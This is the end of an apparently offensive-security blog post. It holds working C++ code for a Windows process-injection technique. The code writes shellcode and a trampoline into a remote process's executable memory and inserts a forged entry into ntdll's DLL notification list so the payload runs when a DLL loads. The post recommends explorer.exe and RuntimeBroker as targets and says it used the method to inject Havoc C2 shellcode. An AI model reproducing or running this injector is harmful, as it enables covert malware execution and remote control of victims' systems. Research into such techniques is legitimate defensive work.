0x48, 0x48, 0x8b, 0x4b, 0x50, 0xe8, 0x85, 0xff, 0xff, 0xff, 0x89, 0xc0, 0x48, 0x39, 0xf0, 0x75, 0x6, 0x48, 0x8b, 0x43, 0x20, 0xeb, 0x11, 0x48, 0x8b, 0x1b, 0x48, 0x85, 0xdb, 0x74, 0x5, 0x48, 0x39, 0xdf, 0x75, 0xd9, 0x48, 0x83, 0xc8, 0xff, 0x48, 0x83, 0xc4, 0x20, 0x5b, 0x5e, 0x5f, 0xc3, 0x41, 0x57, 0x41, 0x56, 0x49, 0x89, 0xd6, 0x41, 0x55, 0x41, 0x54, 0x55, 0x31, 0xed, 0x57, 0x56, 0x53, 0x48, 0x89, 0xcb, 0x48, 0x83, 0xec, 0x28, 0x48, 0x63, 0x41, 0x3c, 0x8b, 0xbc, 0x8, 0x88, 0x0, 0x0, 0x0, 0x48, 0x1, 0xcf, 0x44, 0x8b, 0x7f, 0x20, 0x44, 0x8b, 0x67, 0x1c, 0x44, 0x8b, 0x6f, 0x24, 0x49, 0x1, 0xcf, 0x39, 0x6f, 0x18, 0x76, 0x31, 0x89, 0xee, 0x31, 0xd2, 0x41, 0x8b, 0xc, 0xb7, 0x48, 0x1, 0xd9, 0xe8, 0x15, 0xff, 0xff, 0xff, 0x4c, 0x39, 0xf0, 0x75, 0x18, 0x48, 0x1, 0xf6, 0x48, 0x1, 0xde, 0x42, 0xf, 0xb7, 0x4, 0x2e, 0x48, 0x8d, 0x4, 0x83, 0x42, 0x8b, 0x4, 0x20, 0x48, 0x1, 0xd8, 0xeb, 0x4, 0xff, 0xc5, 0xeb, 0xca, 0x48, 0x83, 0xc4, 0x28, 0x5b, 0x5e, 0x5f, 0x5d, 0x41, 0x5c, 0x41, 0x5d, 0x41, 0x5e, 0x41, 0x5f, 0xc3, 0x90, 0x90, 0x90, 0xe8, 0x0, 0x0, 0x0, 0x0, 0x58, 0x48, 0x83, 0xe8, 0x5, 0xc3, 0xf, 0x1f, 0x44, 0x0 };

int main()
{
    // Get local LdrpDllNotificationList head address
    LPVOID localHeadAddress = (LPVOID)GetDllNotificationListHead();
    printf("[+] Local LdrpDllNotificationList head address: 0x%p\n", localHeadAddress);

    // Get local NTDLL base address
    HANDLE hNtdll = GetModuleHandleA("NTDLL.dll");
    printf("[+] Local NTDLL base address: 0x%p\n", hNtdll);

    // Calculate the offset of LdrpDllNotificationList from NTDLL base
    int offsetFromBase = (BYTE*)localHeadAddress - (BYTE*)hNtdll;
    printf("[+] LdrpDllNotificationList offset from NTDLL base: 0x%X\n", offsetFromBase);

    // Open handle to remote process
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 31588);
    printf("[+] Got handle to remote process\n");

    // Get remote NTDLL base address
    LPVOID remoteNtdllBase = GetNtdllBase(hProc);
    LPVOID remoteHeadAddress = (BYTE*)remoteNtdllBase + offsetFromBase;
    printf("[+] Remote LdrpDllNotificationList head address 0x%p\n", remoteHeadAddress);

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

    // Allocate memory for our trampoline + restore prologue + shellcode in the remote process
    LPVOID trampolineEx = VirtualAllocEx(hProc, 0, sizeof(trampoline) + sizeof(restore) + sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    printf("[+] Allocated memory for trampoline + restore prologue + shellcode in remote process\n");
    printf("[+] Trampoline address in remote process: 0x%p\n", trampolineEx);
    
    // Offset the size of the trampoline to get the restore prologue address
    LPVOID restoreEx = (BYTE*)trampolineEx + sizeof(trampoline);
    printf("[+] Restore prologue address in remote process: 0x%p\n", restoreEx);

    // Offset the size of the trampoline and restore prologue to get the shellcode address
    LPVOID shellcodeEx = (BYTE*)trampolineEx + sizeof(trampoline) + sizeof(restore);
    printf("[+] Shellcode address in remote process: 0x%p\n", shellcodeEx);

    // Find our restoreEx place holder in the trampoline shellcode
    LPVOID restoreExInTrampoline = (LPVOID)FindPattern((DWORD_PTR)&trampoline, sizeof(trampoline), (PBYTE)"\x11\x11\x11\x11\x11\x11\x11\x11", (PCHAR)"xxxxxxxx");

    // Overwrite our restoreEx place holder with the address of our restore prologue
    memcpy(restoreExInTrampoline, &restoreEx, 8);

    // Write the trampoline shellcode to the remote process
    WriteProcessMemory(hProc, trampolineEx, trampoline, sizeof(trampoline), nullptr);
    printf("[+] trampoline has been written to remote process: 0x%p\n", trampolineEx);

    // Write the shellcode to the remote process
    WriteProcessMemory(hProc, shellcodeEx, shellcode, sizeof(shellcode), nullptr);
    printf("[+] Shellcode has been written to remote process: 0x%p\n", shellcodeEx);

    // Create a new LDR_DLL_NOTIFICATION_ENTRY
    LDR_DLL_NOTIFICATION_ENTRY newEntry = {};
    newEntry.Context = NULL;

    // Set the Callback attribute to point to our trampoline
    newEntry.Callback = (PLDR_DLL_NOTIFICATION_FUNCTION)trampolineEx;

    // We want our new entry to be the first in the list 
    // so its List.Blink attribute should point to the head of the list
    newEntry.List.Blink = (PLIST_ENTRY)remoteHeadAddress;

    // Allocate memory buffer for LDR_DLL_NOTIFICATION_ENTRY
    BYTE* remoteHeadEntry = (BYTE*)malloc(sizeof(LDR_DLL_NOTIFICATION_ENTRY));

    // Read the head entry from the remote process
    ReadProcessMemory(hProc, remoteHeadAddress, remoteHeadEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);

    // Set the new entry's List.Flink attribute to point to the original first entry in the list
    newEntry.List.Flink = ((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink;

    // Allocate memory for our new entry
    LPVOID newEntryAddress = VirtualAllocEx(hProc, 0, sizeof(LDR_DLL_NOTIFICATION_ENTRY), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    printf("[+] Allocated memory for new entry in remote process: 0x%p\n", newEntryAddress);

    // Write our new entry to the remote process
    WriteProcessMemory(hProc, (BYTE*)newEntryAddress, &newEntry, sizeof(LDR_DLL_NOTIFICATION_ENTRY), nullptr);
    printf("[+] New entry has been written to remote process: 0x%p\n", newEntryAddress);

    // Calculate the addresses we need to overwrite with our new entry's address
    // The previous entry's Flink (head) and the next entry's Blink (original 1st entry)
    LPVOID previousEntryFlink = (LPVOID)((BYTE*)remoteHeadAddress + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Flink));
    LPVOID nextEntryBlink = (LPVOID)((BYTE*)((PLDR_DLL_NOTIFICATION_ENTRY)remoteHeadEntry)->List.Flink + offsetof(LDR_DLL_NOTIFICATION_ENTRY, List) + offsetof(LIST_ENTRY, Blink));

    // Buffer for the original values we are going to overwrite
    unsigned char originalValue[8] = {};

    // Read the original value of the previous entry's Flink (head)
    ReadProcessMemory(hProc, previousEntryFlink, &originalValue, 8, nullptr);
    memcpy(&restore[4], &previousEntryFlink, 8); // Set address to restore for previous entry's Flink (head)
    memcpy(&restore[15], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[23], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Read the original value of the next entry's Blink (original 1st entry)
    ReadProcessMemory(hProc, nextEntryBlink, &originalValue, 8, nullptr);
    memcpy(&restore[29], &nextEntryBlink, 8); // Set address to restore for next entry's Blink (original 1st entry)
    memcpy(&restore[40], &originalValue[0], 4); // Set the value to restore (1st half of value)
    memcpy(&restore[48], &originalValue[4], 4); // Set the value to restore (2nd half of value)

    // Write the restore prologue to the remote process
    WriteProcessMemory(hProc, restoreEx, restore, sizeof(restore), nullptr);
    printf("[+] Restore prologue has been written to remote process: 0x%p\n", restoreEx);

    // Overwrite the previous entry's Flink (head) with our new entry's address
    WriteProcessMemory(hProc, previousEntryFlink, &newEntryAddress, 8, nullptr);

    // Overwrite the next entry's Blink (original 1st entry) with our new entry's address
    WriteProcessMemory(hProc, nextEntryBlink, &newEntryAddress, 8, nullptr);

    printf("[+] LdrpDllNotificationList has been modified.\n");
    printf("[+] Our new entry has been inserted.\n");

    // Print the remote Dll Notification List
    PrintDllNotificationList(hProc, remoteHeadAddress);

}

Here are the results (for the sake of the photo the shellcode is still spawning calc):

Finding The Right Targets

Up until now, this was all done as a POC with a manufactured target process (RegisterDllNotification.exe). In real situations, we need to choose our targets carefully. To trigger our shellcode and complete the injection, the target process needs to load or unload a DLL. Not every process does this, and those that do don't do it all the time, so prior research into the target process is needed.

I used API Monitor on my machine and looked for processes that call functions whose names contain the words Library and Load:

I found that most instances of RuntimeBroker execute the functions LdrLoadDll and LdrUnloadDll every minute or so:

Explorer.exe does this almost every 5 seconds:

That makes both RuntimeBroker and explorer good candidates for this injection. I will leave finding additional targets, as well as making this injection more OPSEC-safe, as an exercise for the reader.

Conclusions

It has been quite a journey to research this technique, and even more so to write this blog post. I hope it has been informative and will encourage you to research this type of technique further.

And before we finish, here is the final POC of this technique, injecting Havoc C2 shellcode into the explorer process:

Acknowledgments